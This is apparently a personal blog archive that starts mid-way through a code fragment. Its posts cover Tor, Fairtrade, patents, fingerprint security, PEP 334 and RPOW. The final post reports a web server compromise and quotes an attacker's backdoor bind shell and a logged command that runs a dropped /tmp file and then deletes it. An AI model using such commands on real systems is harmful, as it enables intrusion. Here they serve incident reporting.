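        print("the counter reached the monster's next state at", counter)
```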

    Now, once we've generated every possible CA universe, what's left to do? You might think that the CA monster is now frozen. But what more could we do? We could calculate the `next' iteration of his universe, but it already exists in memory. Is the act of actually calculating magical? Or, in fact, is every possible conscious being `living' in our memory; their patterns finding themselves in the dust?

    In fact, every possible rule of physics exists now. Any rule based progression is already there. Time is an illusion caused by the existence of memory. At each step, the entire universe (including all of the rice pudding monster's memories) exists fully formed (as does every other universe). Why should it be surprised that whatever laws of physics it believes in are precisely correct to allow its existence? When everything exists, nothing is surprising.

    (You should, of course, be putting yourself in the place of the rice pudding monster at the moment and wondering why you're so special that you're not just patterns in the dust.)

    A Better Warning System?

    From Wired:

    Wild animals seem to have escaped the Indian Ocean tsunami, adding weight to notions they possess a sixth sense for disasters, experts said Thursday.

    Sri Lankan wildlife officials have said the giant waves that killed over 24,000 people along the Indian Ocean island's coast seemingly missed wild beasts, with no dead animals found.

    We might not understand how it works, but we don't need to do so in order to be able to use it. Tag lots of animals living near the coast and track them by satellite (I'm sure such a system has already been developed for the study of migration patterns etc). When they all start to leave - do likewise.

    Tor actually works pretty...

    Tor actually works pretty well. Of course, this is before it has been really hit hard by any sort of user base (people are only just starting to run BitTorrent through it) but I'm typing this over a real-time mixnet, end-to-end encrypted with bidirectional public key authentication. Maybe there's something to this crypto malarkey after all :)

    Unfortunately the anonymity of Tor falls far short of the real hard line systems as it has a central directory. Basically you trust Tor because you trust arma (Roger Dingledine). But maybe that's actually better because none of those other systems have actually taken off. Having hard line anonymity is no good if your user set is a couple of dozen people. I would hope for some improvements in the centralisation at some point but I'm happy with this as a starting point.

    Fundamentally with any real-time mixnet, global traffic analysis is going to get you (esp with interactive traffic like ssh connections). Global observers are quite rare, and those with the motivation to invest in the infrastructure required are rarer still, but they do exist.

    So a good article from th...

    So a good article from the LA Times on nootropic drugs, which was on Slashdot.

    That text mentions that most of these drugs are being developed as anti-Alzheimer's drugs because it's the only way in which to approach the regulators. There's still a very puritan streak in drugs regulation which says that drugs shouldn't seek to improve people, only to cure something that is wrong.

    The word `improve' is a slippery one in the last sentence - who decides what is an improvement? Simply put; people decide themselves. Millions take caffeine (in many forms) every day as a performance booster and this is legal, mostly because of tradition. No one claims that caffeine is benign. Symptoms of overuse and withdrawal are part of the common culture but, also, no one would suggest that caffeine needs banning (at least no one worth listening to).

    Drugs companies recognise that people do want to improve themselves and they would be very happy to make money by letting people do it. But since they aren't allowed to improve people, they have to create new diseases. So I confidently predict that Senile Brain-Dysfunction (or something like it) will appear very soon as the disease which nootropics can cure.

    The products will almost certainly be prescription only. Otherwise, it would mean admitting that people can take responsibility for their own lives and from there you start wondering why non-addictive psychotropics are illegal - and we can't have that. Yet, despite them being prescription only, I assume that people will get them just as easily as all the other prescription `only' drugs. As far as I'm concerned this is a good thing.

    I'm under no illusion that humans were created perfect and thus need no improvement. Caution is called for as we're playing with a very complex system which we don't really know much about, but not too much.

    So the theatre mentioned ...

    So the theatre mentioned in my previous post has had to cancel the run of the play due to health and safety concerns. What that actually means is that the police are unable to protect them from a mob of sick freaks.

    Welcome to the UK, where free speech has little progressed since 1700.

    Can I suggest that anyone...

    Can I suggest that anyone in Birmingham heads over to the Repertory tonight and makes sure that tonight's performance is packed out?

    For those outside the UK, a number of Sikhs in Birmingham have decided that they can censor a play which they feel is `insulting' by physically attacking the theatre. The police were there in some force, but obviously not enough to do their job.

    This play is exactly what Blunkett was targeting with his offence of Inciting Religious Hatred. A Sikh on Radio4's Today this morning said that he thought as much, though thankfully realised that it would look bad if he said so. The BBC found an excellent correspondent to argue the opposite case in Dr Evan Harris (Lib Dem MP) which makes that Today clip very enjoyable.

    And today I understand that the police are having a meeting with both sides about it. I think they should be apologising for failing to defend the theatre (since the theatre isn't allowed to defend itself) and for not arresting anyone for criminal damage despite many officers being present at the time.

    I await tomorrow morning's news.

    (On the same topic, Channel 4 is supposed to have a good programme on Christmas Day called Who Wrote the Bible.)

    Well, the project which I...

    Well, the project which I was working on at Google has hit Slashdot. I hope that was planned.

    (better link about it [1]. And one from BBC News)

    AdBlock

    Lots of good patent stuff today. The Becker-Posner blog has a couple of long texts on the state of patents in medicine. I'm not a big fan of patents in many spheres of the economy, but drug research patents are sensible. Of course, there are flaws, but I don't think the correct balance here is as far away from the current position as it is in, say, software patents.

    Which brings me neatly to the EU trying to get software patents in via the back door. The headline says it all: EU Council Presidency Schedules Software Patent Directive for Adoption at Fishery Meeting. MEPs have a tough enough time as it is trying to convince people (British people esp) that they matter. Tricks like this certainly don't help.

    And now, if your blood pressure is a little high after that, Jason Schultz has a nice text in Salon. Although comparing patents to ex-USSR nuclear weapons is possibly a little bit strong.

    Hmm. Maybe this paragraph would have been better placed before that Salon link. But if you use Firefox (and if you don't, what the hell are you thinking?) then you should try AdBlock. With some minimal configuration it works really well. Just right click the adverts on a few of your common pages (The Register is a good one) and they are a lot less mentally glaring.

    BBC Radio on your iPod

    Google, very nicely, sent me a 20GB iPod for my birthday so I thought I had better do something useful with it.

    I have a fairly nice system at home for music so I spend the, otherwise wasted, walk to and from Imperial listening to Radio 4.

    You can select the `Listen' link on the website and get their web-based player. Right click and view source. Find ".ram" to pick out the filename URL. Then run lynx -source URL to get the rtsp:// link.

    Here's the trick...

    % mplayer --version
    MPlayer 1.0pre5-3.4.2 (C) 2000-2004 MPlayer Team
    % mplayer -aofile showname-ddmmyy.wav -ao pcm -cache 320 rtsp://...
    .
    .
    .
    % lame -h showname-ddmmyy.wav showname-ddmmyy.mp3

    Then use gtkpod to upload to the iPod.

    Submitted to Felix in rep...

    Submitted to Felix in reply to this, which appeared last Thursday.

    (for any Americans reading this; you probably don't know what a student Union is - don't worry.)

    Jamie Brothwell seems very keen that we should all buy fair trade products, to the point of creating a bureaucracy to check that we do. I'm perfectly happy for him to pay any price that the suppliers and growers agree to, including one which is above the market value. But before there is a "campaign for increased consumption of Fairtrade goods" (funded by our infinitely-bounteous Union I suppose) people should be aware of the problems of Fairtrade.

    When buying Fairtrade coffee you are charitably giving to certain selected groups of producers. Selected, that is, by the Fair Labeling Organisation which charges $2431 + $607/year + $1 per 110 pounds of coffee sold to be certified as a Fair Trade producer. And if you're a small producer (that is, less than 44,000 pounds of coffee per year - $55,440 per year, by FairTrade base prices) then I'm afraid that the FLO "seldom" certifies groups so small [Simen Sandberg, quoted in The Christian Science Monitor, April 13th]

    The problem with the primary FairTrade produce, coffee, is that too much of it is being produced worldwide. In Brazil and Colombia, producers were encouraged to switch from cocaine to coffee. In an effort to rebuild Vietnam, aid went into setting up coffee plantations so that the farmers could be self-sufficient. This led to over-supply of coffee.

    The average coffee production per year increased 28% from 1990 to 2002 [ICO figures], but the values jump wildly - not the sign of a stable market. All this over-supply, of course, caused the price to drop and the less efficient producers to suffer. The inefficient producers in this case were the small, primitive farmers which Fair Trade is supposed to help.

    This gives the efficient producers less incentive to cut costs and keeps those farmers forever at the mercy of the charity of those who buy FairTrade and of the FLO, which soon gains the power to select who will and who won't survive.

    Instead of this perhaps Jamie should be lobbying for the elimination of EU subsidies such as the Common Agricultural Policy. (Though not through the Union of course, because everyone agrees that the Union should limit itself to those issues which affect students as students, don't they?)

    The idiotic effects of the CAP have entered into common usage; "butter mountains", "wine lakes" etc. In 2001, 7m tonnes of sugar was exported [Oxfam, 2002] from the EU, and the EU taxpayer paid a total of $2.1 billion to subsidise this dumping on the world markets.

    The development of internal trade (esp within Africa) and the cessation of dumping under-priced goods on the world market is the way to help these farmers. Hitching them to our charity, which is supported only by the public's wandering attention, is not.

    I've said it before, and ...

    I've said it before, and I'll say it again. Greg Egan is the best sci-fi writer on the planet: Axiomatic

    Currently reading: System of the World.

    Next up after that: Obedience to Authority.

    The remains of a Stage Sc...

    The remains of a Stage Scan.

    Heading home on the coach...

    Heading home on the coach to Cheltenham last Friday (something that I do when I'm in need of a decent meal for a few days) I was stuck in a traffic jam for about 30 minutes. Annoying, but it's fairly small fry on a 3 hour journey. The time passed quickly enough with my special Google branded iPod :).

    But it turned out that the accident happened on one lane of the carriageway running in the opposite direction. The tailback which I was caught in was just the product of people slowing down to take a look. That tendency in the cellular automata of most traffic flows caused a huge tailback. Now there's a tendency to ignore such effects because they're somehow `stupid' but they are perfectly real. So can I suggest that the highway police carry large, self-standing black banners to hide the site of an accident and so avoid traffic jams in future, please?

    And so it begins on the d...

    And so it begins on the day of the Queen's Speech:

    Daily Mail: Al Qaeda attack on Canary Wharf foiled. And it seems that ITV copied the story, but didn't mention the Mail.

    The bits of Whitehall which weren't involved with leaking the story are confused and are denying it. But the bits which were are over the moon.

    Well, only a few months l...

    Well, only a few months late but I finally have my Yosemite photos up.

    I swear that "Yosemite" should have an accent - Yosemité maybe? (It's pronounced 'Yo-sam-i-tee')

    We have the Queen's Speec...

    We have the Queen's Speech on Tuesday. For the non-British; this is where the government announces the legislation that they propose for the next session of parliament. The next session will be the last before the general election.

    It's disconcerting how fast the tone in this country has changed recently for the worse. We've had a lot of it on simmer for a while now I guess, but it's been kept down. Now the Linda Snells have really boiled over.

    As a final act, parliament passed the bill outlawing fox hunting - a bunch of deluded authoritarian crap dreamt up by people who probably drive out to the country and fully expect to bump into the Famous Five. With a bit of luck it will kill the government's support in rural areas. With a lot more luck they won't switch to Tory.

    Now MPs have decided to turn their attention to overeating, smoking and drinking. All pleasures that MPs have famously overindulged in. Drinking will be linked with a large number of `law and order' bills no doubt. Overeating will probably come in the guise of a ban on advertising (some) foods.

    Nothing stirs people up like fear and Labour are running short on it. That's what the Queen's Speech is going to do. Fear of crime, fear of terror, a little fear for everybody and One Government to save them all. I expect Blunkett will be jerking off listening to it. (And that's something else that will probably be in - ID cards).

    And, frankly, there's no chance of stopping any of it. The Conservatives are hopeless and couldn't put up an opposition even if they disagreed with it. The Lib Dems aren't strong enough to even slow it down.

    Ah, crap.

    Writing on Wikipedia for ...

    Writing on Wikipedia for a change, because it will probably be more helpful to the world at large there.

    Wikipedia is missing a big chunk of CS stuff around the page that I wrote. If you know about Tornado codes or Digital Fountains etc, go fill it in! (and save me the trouble)

    On another note...

    US version of free speech; Fearful TV fails Private Ryan.

    So now one cannot show Saving Private Ryan on US TV because of fear of the FCC? A film which won five Oscars and one which my GCSE history teacher made sure that we saw the first ten minutes of because he thought that it was such a great depiction of WWII.

    Stations are free to broadcast what they choose and guess what? If you don't want to watch it you don't have to. You could get a book (I recommend The Confusion, which is much better than the first one). But your government is now dictating what you can watch with vague threats:

    After the FCC refused to guarantee stations they could broadcast the film without fear of repercussion, network executives said they were taking no chances.

    "We're just coming off an election where moral issues were cited as a reason by people voting one way or another and, in my opinion, the commissioners are fearful of the new congress," he said.

    I can understand why the covers of books for UK and US versions differ. You have to mess up the spelling for the US version at least. But why does the US get such poor cover art?

    Terry Pratchett covers are famous here (UK). But the US version is just poor.

    Again, the US version of The Confusion is trash compared to the UK one. Though the US version does have miscut pages to make the book seem old - that's kind of neat.

    Bait and Forget

    Those of us who like arguments and actually seek to get somewhere with them (as opposed to those who like them for their own sake) generally pay attention to lists of logical fallacies. Like those 'proofs' that 1=0, fallacies seem reasonably correct but are actually fundamentally flawed and cause one to end up somewhere stupid.

    Take, for example, this page, which says the following:

    • Event X has occurred (or will or might occur).
    • Therefore event Y will inevitably happen.
    This sort of "reasoning" is fallacious because there is no reason to believe that one event must inevitably follow from another without an argument for such a claim. This is especially clear in cases in which there is a significant number of steps or gradations between one event and another.

    Now, I don't disagree with any of that. But here's a meta fallacy - a fallacy which those who quote fallacies fall into:

    As an example, on that same page, they give this: "We've got to stop them from banning pornography. Once they start banning one form of literature, they will never stop. Next thing you know, they will be burning all the books!"

    There's hyperbole for effect in that, but it's not completely daft. I see this pattern popping up a number of times. Take today's great post on BoingBoing about brands. Cory speaks about how trademark law was introduced for all manner of good reasons, but people have forgotten about them and now trademark law is an axiom in and of itself and is getting abused.

    Copyright law was introduced as a very limited trade between the public (represented by the state) and private entities to introduce a government subsidy for the arts which was distributed by a pseudo-market. But that has been the victim of bait-and-forget. People don't remember why copyright law exists, so we have the very counterproductive system which we have now, within which "copyright must be enforced" is all the reasoning that is required from its beneficiaries. This is also, soon, going to lead to the extension of copyright of music in the EU because no one in power can remember why, exactly, copyright was ever for a limited time in the first place.

    So, the meta-fallacy can roughly be put: "It's not slippery slope - but if we do this thing, X, which is reasonable at the moment then everyone will forget why we did it and it will lead to bad things."

    Pumpkins!

    The front of my flat :)

    Thanks flatmates

    Thanks flatmates :)

    XPath in Mozilla

    There really should be better documentation for this sort of thing. Maybe there is, but Google doesn't find it very well. Anyway...

    var result = xmldocument.evaluate(xpathQuery,  // XPath expression, as a string
      xpathRootElement,                            // context node to evaluate against
      null, XPathResult.UNORDERED_NODE_SNAPSHOT_TYPE, null);

    The xmldocument seems able to be any DOM document object - it doesn't have to be connected with the root element, so it could, for example, be document. Note that a general Node object won't do - they don't have an evaluate method.

    Then the result object has a property snapshotLength giving the number of results and a given result Node object can be obtained by calling snapshotItem(i).

    Replacements for Copyright

    (In-Reply-To: http://locut.us/~ian/blog/archives/26-Alternatives-to-Copyright-FairShare.html)

    So there are a number of different proposals for replacing copyright as a model for funding creative artists (or whatever you wish to call them). Some of them I cringe at, generally they propose a government authority which decides what is `art' and dishes out money to it. Much like a lot of direct government funding of the arts does today. I think I'm cringing in the same way that Ian does at such an idea; I mean 'government', 'art', 'committee' - doesn't it make you cringe? It's almost as bad as 'government', 'NHS', 'national IT project' - but that one actually makes me sick; different story.

    So there are also less cringe-worthy proposals such as Fairshare. These are usually based on a market, or at least a model of interacting, self-interested parties. But many people of a certain persuasion hear the word property in `intellectual property' and light up. I think the word association goes something like 'property' → 'no government needed' → 'good'. As far as I can see it's that simple.

    I keep hitting these people and they really should know better. Let's look at the difference between the government giving out grants and the current copyright system. In the former we are all forced to give up something (money, via taxes) and this is distributed to others via a process (arts boards, funds etc). In the latter we are all forced to give up something (our right to copy freely) and this is distributed to others (copyright holders). This does lead to the actual money being distributed via a market system as opposed to government committee, which is a fairly neat hack, but it has ceased to work.

    Ponder what would happen if everyone on Earth suddenly had the ability to duplicate physical objects. You could go to a dinner party, really like the wallpaper and, with a click of the fingers, have it in your own house. I would bet that everyone would, within a week, be required to register and have all their fingers broken. Because it preserves the market, right? And markets are good, even when they're a bastard warping of reality caused by the mass of government distorting space-time around it, right?

    (In-Reply-To: http://locut.us/~ian/blog/archives/15-An-alternative-to-Senator-Boxer-for-California-Democrats.html)

    So one may very well have issues with voting for a libertarian in California given that they can get a little divergent and unhinged in places. But you don't have to agree with the aims of a person to vote for them. Very few Senators are actually going to have a huge impact on the world. One can vote for someone in order to steer the region towards those goals even if one would stop short of agreeing with them. It's also reasonable to interpolate between governments in successive elections.

    So I'm now doing UNIX cap...

    So I'm now doing UNIX capability systems as a degree project. It was almost managing petabytes but that one lost out for a number of reasons. Progress wasn't bad until the group project started and that has now taken all my time.

    In other news. I'm now going to be working for Google full-time come July. At first probably in Zürich and then back to Mt. View. :)

    Photos of Yosemite are sitting on the server now, I just need to get round to thumbnailing them which will hopefully be fairly soon.

    Upgrade your CVS copies of Stackless if you have one. I fixed a bug which was biting me in the course of working on the capability project.

    Google have a new paper out on MapReduce. Another thing I can now talk about!

    So IBM now have a laptop ...

    So IBM now have a laptop with a fingerprint scanner built in. So, what is this meant to protect beyond passwords? Let's consider the attack cases:

    1. Someone steals the laptop because you left it somewhere stupid like the pub (let's call this the MI5 case)
    2. Someone is playing with the laptop while you're away for a moment
    3. Someone targets the laptop because they want the data on it

    And a few facts from the piece:

    • You can set up the scan at boot time and that's enough to log in and load the encryption key
    • It suggests that the scanner itself stores the fingerprint hashes

    Also remember that fingerprints are only secure if you trust the reader and nearly all readers suck. It's very difficult for a fingerprint scanner to tell the difference between a real finger and something which looks just like it, but isn't attached to a person.

    In case 1 the attacker knows nothing about you. If you care enough about your data to `encrypt' the hard drive (because, if you don't, they can lift the contents of the disk anyway) they are probably stuffed. A reasonable passphrase is probably enough to stop them as they are mostly after the hardware itself to sell on.

    Now, if it has a fingerprint scanner the laptop is probably less secure because the owner's fingerprints are going to be on the laptop or something in the same case. The effort required to break a passphrase is measurable. The effort required with a fingerprint is constant and small if you have the fingerprint in question.
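
    To put a rough number on "measurable", here is a minimal sketch. It assumes a passphrase made of words picked uniformly at random from a word list; the list size, word count and guess rate are illustrative assumptions, not figures from the IBM piece.

```python
import math

def passphrase_bits(wordlist_size: int, words: int) -> float:
    """Entropy in bits of `words` words drawn uniformly from the list."""
    return words * math.log2(wordlist_size)

def years_to_search(bits: float, guesses_per_second: float) -> float:
    """Expected years to find the passphrase (half the keyspace on average)."""
    seconds = (2 ** bits / 2) / guesses_per_second
    return seconds / (365 * 24 * 3600)

# Hypothetical numbers: 4 words from a 2048-word list, a million guesses/second.
bits = passphrase_bits(2048, 4)
years = years_to_search(bits, 1e6)
print(bits, years)
```

    Adding a word adds a fixed number of bits, so the attacker's cost scales with the owner's effort. A lifted fingerprint has no such knob.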

    In the second case (assuming that you didn't leave it logged in), there's little chance that someone is going to brute force a passphrase manually. But they could lift a fingerprint and come back next day with a fake made up. Again, you're probably better off with a passphrase.

    In the third case you're certainly better off with a passphrase. Since the encryption keys are stored in the hardware in the case of fingerprint security (and laptop hardware isn't very tamper resistant) a break is probably easy for a well equipped group. In the case of a passphrase they either brute force it, or have to install a logger, get it back to you and steal it again. Not impossible, but harder.

    So the fingerprint scanner may be neat - but I wouldn't use it on its own.

    POSIX 1e ACLs are all ver...

    POSIX 1e ACLs are all very wonderful and so on, and the big reason that they're wonderful is that you can specify default ACLs which say something like "every file created in this directory should be writable by group foo". That is, until the user creates them with a umask of 022 and the write permission is masked away.

    I'm sure that POSIX had a good reason for this somewhere, but umask has never worked very well anyway. So here's a utility which fixes up files which were created with a bad umask. Run it like this

    find path -print0 | xargs -0 acldeletemask

    Schneier's Essay

    So, as Oskar at least has noticed, comments have been removed from this site. This is for two reasons: few people used them - they mostly emailed me anyway; I switched to a new server and couldn't be bothered to set up comments.

    But Oskar wanted to take me up on a few points. I'm not posting his email here because it wasn't public and I haven't asked him.

    I linked to an essay a while back about car license plates. The reason I did this is because I thought it put across a good point that ease of access makes a fundamental difference. Often it's suggested that since cars have "always" had license plates, then the introduction of cameras which can log every car isn't a fundamental change.

    For most of the time that ID plates have been in operation there has been a cost to looking them up. That cost was in the time it took to do it. Thus there was a fairly inflexible limit to the rate of queries and they didn't have to ban anything because there were no technologies that could do it quicker.

    But that cost has now disappeared and reducing the cost of anything to zero usually results in a big effect. We could impose a query limit on the central computer somewhere - but we all know that would be ignored for 'national security' and they could get traffic analysis anyway.

    Maybe now that the old system (of limited lookups) is impossible we shouldn't have license plates (and maybe we should never have had them), but I don't believe that we'll ever get that freedom back.

    Kosovo

    Next up, my linking to this Guardian text.

    Now, I'm sure that many writers for the Guardian would be very upset at the thought of an unregulated market. All that uncertainty, all that rope to hang oneself with. Much better to have some government take care of all that for me, right? Not as far as I'm concerned and Oskar suggests this report which shows the link between uninterfered markets and their success.

    But Kosovo and Iraq aren't examples of corrupt backwards governments being knocked over for the good of the people. The assets of the state are being stolen by force. The people of those countries were forced to buy these `public' enterprises for the state or to give their labour to them - misguided and inefficient as they may have been. That was the first theft and that should be righted as much as possible by giving the people ownership of them. If they then choose to sell to someone else that's their business.

    But, unsurprisingly, what's happening is that these assets are being sold off to outside groups with the proceeds disappearing into the mists of government. The spoils of war, right?

    RPOW

    Just to make it clear - I don't think that RPOW is going anywhere practically. A currency backed by a non-scarce resource isn't going to work. Worse yet, Moore's Law suggests an inflation rate of about 160% per year, right? :)
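
    A back-of-envelope check of that figure, assuming the common reading of Moore's Law as the cost of computation halving every 18 months (the doubling period is an assumption, not something stated above):

```python
# Assumption: the cost of computing a proof-of-work token halves every 18 months.
DOUBLING_MONTHS = 18

def yearly_growth_factor(doubling_months: float) -> float:
    """How many times more tokens the same money buys after 12 months."""
    return 2 ** (12 / doubling_months)

factor = yearly_growth_factor(DOUBLING_MONTHS)
print(f"{factor:.2f}x per year")  # about 1.59x, i.e. roughly 160% of last year
```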

    PEP 334

    (background reading: PEP 334)

    Can you believe that I'm still going on about async IO programming? Well if someone would get it right I could shut up :)

    My current framework du jour is one I did myself based on Stackless. Yes, I've played with Twisted a lot, and I'm not a huge fan. For one, the core itself isn't 1.0 standard (the reactors still have stupid bugs where they listen on closed sockets and short circuit) and the http code is unusable in a hostile environment.

    Stackless provides user-land threads and my framework is pretty standard. The main problems are that having to patch the python interpreter is a pain and there are a few parts of Stackless that I don't quite understand - mostly because the documentation isn't there.

    PEP 334 promises some of the same things as Stackless - but in the standard CPython. Let's look at a Python generator:

    def gen():
        a = 1
        yield a
        yield 2

    This function returns multiple values and keeps state between invocations. The ability to keep state is very similar to user-land threads and one can easily imagine a generator which yields values from a socket. However, when the operation blocks the generator would have to yield an out-of-band value to denote this. Every use of the socket generator would then have to handle this - dragging the code quickly into the realm of the unreadable and unwritable.
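
    A minimal sketch of that problem, using a list in place of a real socket. WOULD_BLOCK, socket_reader and lines are names made up for illustration:

```python
WOULD_BLOCK = object()  # hypothetical out-of-band marker

def socket_reader(chunks):
    """Stand-in for a socket: None in `chunks` means 'no data yet'."""
    for chunk in chunks:
        yield WOULD_BLOCK if chunk is None else chunk

def lines(reader):
    """Every consumer has to check for the marker and pass it upwards."""
    buf = ""
    for item in reader:
        if item is WOULD_BLOCK:
            yield WOULD_BLOCK      # propagate by hand at every level
            continue
        buf += item
        while "\n" in buf:
            line, buf = buf.split("\n", 1)
            yield line

out = list(lines(socket_reader(["he", None, "llo\nwor", None, "ld\n"])))
```

    Here out interleaves the marker with the real lines, and anything layered on top of lines() needs the same check again.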

    This issue is very similar to error handling and we have a way to cope with this - exceptions. So the idea of PEP 334 is to allow generators to raise a SuspendIteration exception without destroying themselves. (At the moment, once a generator has raised an exception it is finished.) The SuspendIteration would carry a payload of the objects which it is blocking on.

    The top of the call chain would be the IO core which would call each top-level suspended iterator (which would call others etc) until it hit a blocking IO operation and raised SuspendIteration. This would run back up the call chain and the IO core would make note of which objects (sockets etc) that generator is blocking on. Later if those objects become ready the generator can be called again and allowed to progress.
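
    SuspendIteration does not exist in today's Python, so the following sketch of such an IO core approximates it: a top-level generator simply yields the object it is blocked on. FakeSocket, task and io_core are hypothetical names, and a scripted list of events stands in for select() or poll().

```python
from collections import deque

class FakeSocket:
    """Hypothetical stand-in for a socket; `ready` flips when data arrives."""
    def __init__(self, name):
        self.name, self.ready, self.data = name, False, None

def task(sock, log):
    while not sock.ready:
        yield sock                 # "suspend": report what we are blocked on
    log.append((sock.name, sock.data))

def io_core(tasks, events):
    """Run tasks; park each on the object it yields until an event readies it."""
    runnable, parked = deque(tasks), {}
    events = deque(events)
    while runnable or parked:
        while runnable:
            t = runnable.popleft()
            try:
                parked[next(t)] = t     # blocked: remember which object
            except StopIteration:
                pass                    # task finished
        if parked:
            sock, data = events.popleft()   # stand-in for select()/poll()
            sock.ready, sock.data = True, data
            runnable.append(parked.pop(sock))

a, b = FakeSocket("a"), FakeSocket("b")
log = []
io_core([task(a, log), task(b, log)], [(b, "second"), (a, "first")])
```

    The tasks finish in the order their sockets become ready, not the order they were started.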

    So the first issue is that there's no way to poke an exception into the bottom of a generator. (The ability to poke a TimedOut exception is very useful.) But, so long as all the blocking objects (wrappers around sockets, Channels, Mutexes etc) pay attention to a global variable they could be made to raise a given exception.

    Thus I cheer PEP 334 onwards because it could lead to a nice IO framework that works in all the pythons without patching.

    So, I'm done. And I cunni...

    So, I'm done. And I cunningly left before anything major that I wrote was used in anger :)

    Just random things: TiddlyWiki is very cool. Mix in a little WebDAV and XMLHttpRequest and it would be really useful.

    Good essay from Mr Schneier again.

    The Hitchhiker episode went out and I quite liked it. I prefer the old Book and I don't think the script is quite as sharp this time (but how could it be?) - but I like it. I've written code to record RealPlayer to OGG, but it's a pain to use and I don't have it on my laptop. Maybe I'll be able to record next week's.

    Another series that I wish I had recorded (still going) is Mr Hardy's current work. Probably the best thing on radio at the moment.

    Long time - no post. And ...

    Long time - no post. And even now it's not going to be very long.

    It's my last week at Google and it's going to be a very busy one. Of course, I can't say what I'm doing but maybe one day it will be public and I can point.

    But more importantly - and I'm sure that readers will know this, but - the new Hitchhikers series starts today in about 11 hours. This is not optional. If you don't listen to this people will be spitting at you on the street tomorrow. Well, maybe not, but I happen to think that you should listen. In years gone by I could (with a little prompting) recite most of the original radio series.

    So, you have your mission for the day and while you're waiting maybe you should read this. With the `second war' starting in Iraq (i.e. they've run out of space under the carpet) and all. Freeing people sure seems to cost a lot of money and lives.

    Google misinformation

    Slashdot: Google has now taken it one step further and created a word-identification script filter as part of the login process. Let's clear this up: no, they haven't.

    I can only assume that what this person is seeing is the anti-bruteforce measures which only kick in when you trigger an alarm that a script is trying to brute force your password. Good luck finding anyone on /. who has actually checked the publicly accessible front page to see that the story is crap.

    Switched servers. This is...

    Switched servers. This is more a message for me so that I know which server I'm looking at!

    New photos up...

    New photos up

    A little while back all t...

    A little while back all the talk was of Palladium and how `trusted hardware' was going to bring forth an end to general purpose computing. (I'm not ridiculing that notion - it may happen, though I think it's less likely now.) I remember being in a hotel in Guildford at the time so I guess that was summer 2002.

    People were horrified at this prospect and never have so many people linked to The Right to Read in such a short span of time. But I was arguing something different at the time:

    Just because TCPAv1
    *may* be a stepping stone towards something bad doesn't automatically make
    TCPAv1 bad. As Hal and I have pointed out, TCPAv1 has a number of interesting
    uses and I, for one, will not be asking people to boycot it.

    Now, I don't pretend that anyone gave two hoots about what I thought once Hal popped up. But this is a kind of "told you so" link because Hal has now gone and proven that there is a use to this stuff with RPOW.

    Normally POW tokens can't be reused because that would allow them to be double-spent. But RPOW allows for a limited form of reuse: sequential reuse. This lets a POW token be used once, then exchanged for a new one, which can again be used once, then once more exchanged, etc. This approach makes POW tokens more practical for many purposes and allows the effective cost of a POW token to be raised while still allowing systems to use them effectively.
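
    The sequential-reuse idea can be modelled in a few lines. This is a toy, not Hal's protocol or code: there is no proof of work, no signing and no 4758, and ExchangeServer, mint and exchange are made-up names.

```python
import secrets

class ExchangeServer:
    """Toy model of sequential reuse; not Hal's actual protocol or code."""
    def __init__(self):
        self._live = set()          # tokens that have not been spent yet

    def mint(self):
        # A real system would only issue a token against proof of work;
        # this sketch just hands one out.
        token = secrets.token_hex(16)
        self._live.add(token)
        return token

    def exchange(self, token):
        """Spend `token` and return a fresh one; fail on a double spend."""
        if token not in self._live:
            raise ValueError("unknown or already spent token")
        self._live.remove(token)
        return self.mint()

server = ExchangeServer()
first = server.mint()
second = server.exchange(first)     # first is now spent, second is usable
try:
    server.exchange(first)
    double_spend_allowed = True
except ValueError:
    double_spend_allowed = False
```

    Everything hinges on the server really keeping that spent-token state honestly, which is exactly the part that has to be trusted.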

    I'm not yet convinced that RPOW is actually very useful, but that isn't the point. The point is that I have a strong chain of trust that Hal's server does what he says it does. It's running on an IBM 4758 and IBM publishes the root key for that in lots of places, including every printed manual. That key signs the onboard key of the 4758 and the 4758 signs the code that it's running. I have a decent amount of trust in IBM because they are certified by NIST and they sell lots of these to the banking sector - so they have a strong financial interest in keeping things above board.

    This is a fundamentally different primitive to those which we are used to dealing with. Usually we need either reputation systems, trusted third parties or verifiable proofs of correctness (very rare). In a sense IBM here is a trusted third party but they are one level removed; we aren't trusting them to implement some protocol, but to make devices which can be configured to implement the protocol. There's a saying that every problem in computer science can be solved by implementing another layer of abstraction so we should be pretty excited about what this new layer gives us.

    Of course, it's not some magic bullet. Not very many people have 4758s and they aren't going to become standard anytime soon. Also, they are pretty slow. But I can do a number of things which I couldn't do before:

    I could implement a notary public and people would have a strong trust that it functioned correctly without knowing anything about me. I can do stuff like Hal's RPOW (or a number of financial things) and people could verify that I wasn't doing anything untoward etc. I'm sure that more ideas will pop up now that this is in our collective mental toolkit.

    How this relates to TCPA:

    Now, TCPA also includes remote attestation (the ability to sign the running code) but I feel that this is almost completely useless. For a start there will probably be a number of producers of TCPA chips and this dilutes the trust quite a lot already. Secondly, TCPA chips aren't going to be nearly so hard to subvert as a 4758. The 4758 isn't perfect (no tamper-resistance is), but FIPS level 4 says it's pretty good. Thirdly, it's utterly pointless for the TCPA to sign a Linux or NT kernel image; the trust flowing through either of those to a given running application (assuming that they had been modified so that they could sign the code that they were running) is tiny. At best, the application would have to be implemented as a very stripped down kernel - making the box useless for anything else.

    But TCPA does have sealing (the ability to encrypt data keyed by the fingerprint of the running kernel). The first two points above still apply, but what I want this for is storing the encryption key for the hard drive so that it cannot be removed and inspected on another computer (or booted with another kernel from a floppy etc).

    So I still think that TCPA has a place … but not remote attestation.

    Heeps cracked

    Seeing an email titled "UMMMM.... BAD BAD THINGS ON HEEPS" isn't the best start to a day. In fact, I would go as far as to say that it sucks.

    So heeps is heeps.union.ic.ac.uk, also known as www.union.ic.ac.uk and a whole lot of other hosts. The email from Sam:

    sjs298@heeps music $ sudo ps aux | grep pra
    Password:
    www_soc  12644  0.0  0.0  1420  236 ?        S    Jul21   0:00 ./pra
    sjs298@heeps music $ sudo netstat -ap | grep pra
    tcp        0      0 *:18383                 *:*                     LISTEN      12644/pra          
    sjs298@heeps music $ telnet localhost 18383    
    Trying 127.0.0.1...
    Connected to localhost.
    Escape character is '^]'.
     
    sh-2.05b$ whoami
    whoami
    www_soc_medic_music
    sh-2.05b$
    
    Now I'd class that as a Hack... probably via PHPBB.
    /www/doc_root/medic/music/forums < PHPBB 2.0.4

    Certainly phpBB has been a pain in the past and this is why all php scripts run as a special, per group, user on heeps. But ok, not a huge deal. Security measures had worked, they didn't seem to have root and there were all manner of limits in place.

    We also have great logging:

    Aug 12 23:13:15 heeps grsec: From 65.102.167.50: exec of /bin/bash (sh
    -c /tmp/dsadas;rm -f /tmp/dsadas ) by (php:26669) UID(9113)
